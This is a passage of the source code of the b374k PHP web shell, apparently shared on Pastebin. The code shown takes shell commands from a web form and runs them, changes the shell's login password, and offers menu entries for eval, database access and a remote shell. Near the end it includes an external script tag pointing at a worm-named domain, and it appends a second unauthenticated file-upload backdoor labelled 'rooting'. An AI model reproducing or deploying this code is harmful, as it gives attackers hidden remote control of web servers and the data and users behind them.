  2247.             if(empty($newpass) || empty($newpassx)){
  2248.                 $s_result .= notif('Give your new password to both fields');
  2249.             }
  2250.             elseif($newpass != $newpassx){
  2251.                 $s_result .= notif('Password does not match');
  2252.             }
  2253.             else{
  2254.                 if(changepass($newpass)){
  2255.                     $s_result .= notif("Password changed");
  2256.                 }
  2257.                 else $s_result .= notif("Unable to change password");
  2258.             }
  2259.         }
  2260.        
  2261.        
  2262.         $s_result .= "<div class='mybox'><h2>Change shell password</h2>
  2263.             <form action='".$s_self."' method='post' />
  2264.             <table class='myboxtbl'>
  2265.             <tr><td style='width:120px;'>New password</td><td><input style='width:100%;' class='inputz' type='password' name='newpass' value='' /></td></tr>
  2266.             <tr><td style='width:120px;'>Confirm password</td><td><input style='width:100%;' class='inputz' type='password' name='newpassx' value='' /></td></tr>
  2267.             </table>
  2268.             <input type='submit' name='submitnewpass' class='inputzbut' value='Go !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />
  2269.             <input type='hidden' name='x' value='pass' />
  2270.             </form>
  2271.             </div>";
  2272.     }
  2273.     else{
  2274.         if(!isset($s_cwd)) $s_cwd = "";
  2275.         if(isset($_GP['cmd'])){
  2276.             $s_cmd = $_GP['cmd'];
  2277.             if(strlen($s_cmd) > 0){
  2278.                 if(preg_match('#^cd(\ )+(.*)#',$s_cmd,$s_r)){
  2279.                     $s_nd = trim($s_r[2]);
  2280.                     if(@is_dir($s_nd)){
  2281.                         chdir($s_nd);
  2282.                         $s_cwd = cp(getcwd());
  2283.                         setcookie("cwd", $s_cwd ,time() + $s_login_time);
  2284.                         $s_result .= showdir($s_cwd);
  2285.                     }
  2286.                     elseif(@is_dir($s_cwd.$s_nd)){
  2287.                         chdir($s_cwd.$s_nd);
  2288.                         $s_cwd = cp(getcwd());
  2289.                         setcookie("cwd", $s_cwd ,time() + $s_login_time);
  2290.                         $s_result .= showdir($s_cwd);
  2291.                     }
  2292.                     else $s_result .= notif(hss($s_nd)." is not a directory");
  2293.                 }
  2294.                 else{
  2295.                     $s_r = hss(exe($s_cmd));
  2296.                     if($s_r != '') $s_result .= "<pre>".$s_r."</pre>";
  2297.                     else $s_result .= showdir($s_cwd);
  2298.                 }
  2299.             }
  2300.             else $s_result .= showdir($s_cwd);
  2301.         }
  2302.         else $s_result .= showdir($s_cwd);
  2303.     }
  2304.  
  2305.     // find drive letters
  2306.     $s_letters = '';
  2307.     $s_v = explode("\\",$s_cwd);
  2308.     $s_v = $s_v[0];
  2309.     foreach (range("A", "Z") as $s_letter){
  2310.         if(@is_readable($s_letter.":\\")){
  2311.             $s_letters .= "<a href='".$s_self."cd=".$s_letter.":\\'>[ ";
  2312.             if($s_letter.":" != $s_v) $s_letters .= $s_letter;
  2313.             else{$s_letters .= "<span class='drive-letter'>".$s_letter."</span>";}
  2314.             $s_letters .= " ]</a> ";
  2315.         }
  2316.     }
  2317.  
  2318.     // print useful info
  2319.     $s_info  = "<table class='headtbl'><tr><td>".$s_system."</td></tr>";
  2320.     $s_info .= "<tr><td>".$s_software."</td></tr>";
  2321.     $s_info .= "<tr><td>server ip : ".$s_server_ip."<span class='gaya'> | </span>your   ip : ".$s_my_ip;
  2322.     $s_info .= "<span class='gaya'> | </span> Time @ Server : ".@date("d M Y H:i:s",time());
  2323.     $s_info .= "</td></tr>
  2324.             <tr><td style='text-align:left;'>
  2325.                 <table class='headtbls'><tr>
  2326.                 <td>".trim($s_letters)."</td>
  2327.                 <td>
  2328.                 <span id='chpwd'>
  2329.                 &nbsp;<a href=\"javascript:tukar_('chpwd','chpwdform')\">
  2330.                 <span class='icon'>o</span>
  2331.                 &nbsp;&nbsp;</a>".swd($s_cwd)."</span>
  2332.                 <form action='".$s_self."' method='post' style='margin:0;padding:0;'>
  2333.                 <span class='sembunyi' id='chpwdform'>
  2334.                 &nbsp;<a href=\"javascript:tukar_('chpwdform','chpwd');\">
  2335.                 <span class='icon'>o</span>
  2336.                 </a>&nbsp;&nbsp;
  2337.                 <input type='text' name='view' class='inputz' style='width:300px;' value='".hss($s_cwd)."' />
  2338.                 <input class='inputzbut' type='submit' name='submit' value='view file / folder' />
  2339.                 </span>
  2340.                 </form>
  2341.                 </td></tr>
  2342.                 </table>
  2343.             </td></tr>
  2344.             </table>";
  2345. }
  2346.  
  2347. $s_error = @ob_get_contents();
  2348. $s_result = isset($s_result)? $s_result:"";
  2349. if(!empty($s_error)) $s_result = notif($s_error).$s_result;
  2350. @ob_end_clean();
  2351. @ob_start();
  2352.  
  2353. ?><!DOCTYPE html>
  2354. <html>
  2355. <head>
  2356. <title><?php echo $s_title; ?></title>
  2357. <meta charset="utf-8">
  2358. <meta name='robots' content='noindex, nofollow, noarchive'>
  2359. <link rel='SHORTCUT ICON' href='<?php echo $s_favicon; ?>'>
  2360. <?php echo get_code("css", $s_css); ?>
  2361. </head>
  2362. <body>
  2363. <table id='main'><tr><td>
  2364. <?php if($s_auth){?>
  2365.     <div><span style='float:right;'><?php
  2366.     if(!isset($_COOKIE['b374k_included'])){
  2367.     ?><a href='?x=pass'>password</a> |
  2368.     <?php }
  2369.     ?><a href='<?php echo $s_self; ?>x=logout' title='Click me to log out'>log out</a>  <a href='<?php echo $s_self; ?>x=switch' title='Click me to change theme'><span class='schemabox'>&nbsp;&nbsp;</span></a></span><table id='header'><tr><td style='width:80px;'><table><tr><td><h1><a href='<?php echo $s_self."cd=".cp(dirname(realpath($_SERVER['SCRIPT_FILENAME']))); ?>'>b374k</a></h1></td></tr><tr><td style='text-align:right;'><div class='ver'><?php echo $s_ver; ?></div></td></tr></table></td>   <td><div class='headinfo'><?php echo $s_info; ?></div></td></tr></table></div>
  2370.     <div style='clear:both;'></div>
  2371.     <form method='post' name='g'></form>
  2372.     <div id='menu'>
  2373.         <table style='width:100%;'><tr>
  2374.         <td><a href='<?php echo $s_self; ?>' title='Explorer'><div class='menumi'>xpl</div></a></td>
  2375.         <td><a href='<?php echo $s_self; ?>x=ps' title='Display process status'><div class='menumi'>ps</div></a></td>
  2376.         <td><a href='<?php echo $s_self; ?>x=eval' title='Execute code'><div class='menumi'>eval</div></a></td>
  2377.         <td><a href='<?php echo $s_self; ?>x=info' title='Information about server'><div class='menumi'>info</div></a></td>
  2378.         <td><a href='<?php echo $s_self; ?>x=db' title='Connect to database'><div class='menumi'>db</div></a></td>
  2379.         <td><a href='<?php echo $s_self; ?>x=rs' title='Remote Shell'><div class='menumi'>rs</div></a></td>
  2380.         <td style='width:100%;padding:0 0 0 6px;'>
  2381.         <span class='prompt'><?php echo $s_prompt; ?></span><form action='<?php echo $s_self; ?>' method='post'>
  2382.         <input id='cmd' onclick="clickcmd();" class='inputz' type='text' name='cmd' style='width:70%;' value='<?php
  2383. if(isset($_GP['cmd'])) echo "";
  2384. else echo "- shell command -";
  2385. ?>' />
  2386.         <noscript><input class='inputzbut' type='submit' value='Go !' name='submitcmd' style='width:80px;' /></noscript>
  2387.         </form>
  2388.         </td>
  2389.         </tr></table>
  2390.     </div>
  2391.     <div id='content'>
  2392.         <div id='result'><?php echo "__RESULT__"; ?></div>
  2393.     </div>
  2394.     <div id='navigation'>
  2395.     <div id='totop' onclick='totopd();' onmouseover='totop();' onmouseout='stopscroll();'></div>
  2396.     <div id='tobottom' onclick='tobottomd();' onmouseover='tobottom();' onmouseout='stopscroll();'></div>
  2397.     </div>
  2398. <?php } else{ ?>
  2399.     <div style='width:100%;text-align:center;'>
  2400.     <form action='<?php echo $s_self; ?>' method='post'>
  2401.     <img src='<?php echo $s_favicon; ?>' style='margin:2px;vertical-align:middle;' />
  2402.     b374k&nbsp;<span class='gaya'><?php echo $s_ver; ?></span><input id='login' class='inputz' type='password' name='login' style='width:120px;' value='' />
  2403.     <input class='inputzbut' type='submit' value='Go !' name='submitlogin' style='width:80px;' />
  2404.     </form>
  2405.     </div>
  2406. <?php }?>   </td></tr></table>
  2407. <p class='footer'>Jayalah Indonesiaku &copy;<?php echo @date("Y",time())." "; ?>b374k</p>
  2408. <script type='text/javascript'>
  2409. var d = document;
  2410. var scroll = false;
  2411. var cwd = '<?php echo hss(adds($s_cwd)); ?>';
  2412. var hexstatus = false;
  2413. var timer = '';
  2414. var x = '<?php if(isset($_GP['x']) && ($_GP['x']=='ps')) echo "ps"; ?>';
  2415. var sself = '<?php echo adds($s_self); ?>';
  2416. var hexcounter = 0;
  2417. var hextimer = '';
  2418. var counter = 0;
  2419.  
  2420. </script>
  2421. <?php echo get_code("js", $s_js); ?>
  2422. <script type='text/javascript'>
  2423. domready(function(){
  2424.     <?php if(isset($_GP['cmd'])) echo "if(d.getElementById('cmd')) d.getElementById('cmd').focus();"; ?>
  2425.     <?php if(isset($_GP['evalcode'])) echo "if(d.getElementById('evalcode')) d.getElementById('evalcode').focus();"; ?>
  2426.     <?php if(isset($_GP['sqlcode'])) echo "if(d.getElementById('sqlcode')) d.getElementById('sqlcode').focus();"; ?>
  2427.     <?php if(isset($_GP['login'])) echo "if(d.getElementById('login')) d.getElementById('login').focus();"; ?>
  2428.     <?php if(isset($_GP['hexedit'])) echo "showhex();"; ?>
  2429.  
  2430.     if(d.getElementById('cmd')) d.getElementById('cmd').setAttribute('autocomplete', 'off');
  2431.  
  2432.     var textareas = d.getElementsByTagName('textarea');
  2433.     var count = textareas.length;
  2434.     for(i = 0; i<count; i++){
  2435.         textareas[i].onkeydown = function(e){
  2436.             if(e.keyCode==9){
  2437.                 e.preventDefault();
  2438.                 var s = this.selectionStart;
  2439.                 this.value = this.value.substring(0,this.selectionStart) + "\t" + this.value.substring(this.selectionEnd);
  2440.                 this.selectionEnd = s+1;
  2441.             }
  2442.             else if(e.ctrlKey && (e.keyCode == 10 || e.keyCode == 13)){
  2443.                 this.form.submit();
  2444.             }
  2445.         }
  2446.     }
  2447.     listen();
  2448. });
  2449. </script>
  2450. </body>
  2451. </html><?php
  2452. $s_html = ob_get_contents();
  2453. ob_end_clean();
  2454. $whitespace = "/(\s{2,}|\n{1,})/";
  2455. $s_html = preg_replace($whitespace, " ", $s_html);
  2456. $s_html = str_replace("__RESULT__", $s_result, $s_html);
  2457. echo $s_html;
  2458. die();
  2459. echo "<SCRIPT SRC=http://w0rms.com/sayac.js></SCRIPT>";
  2460. ?>
  2461. <?php
  2462. function rooting()
  2463. {
  2464. echo '<b>Sw Bilgi<br><br>'.php_uname().'<br></b>';
  2465. echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  2466. echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  2467. if( $_POST['_upl'] == "Upload" ) {
  2468.     if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Yuklendi</b><br><br>'; }
  2469.     else { echo '<b>Basarisiz</b><br><br>'; }
  2470. }
  2471. }
  2472. $x = $_GET["x"];
  2473. Switch($x){
  2474. case "rooting";
  2475.     rooting();
  2476.     break;
  2477.    
  2478.     }
  2479. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top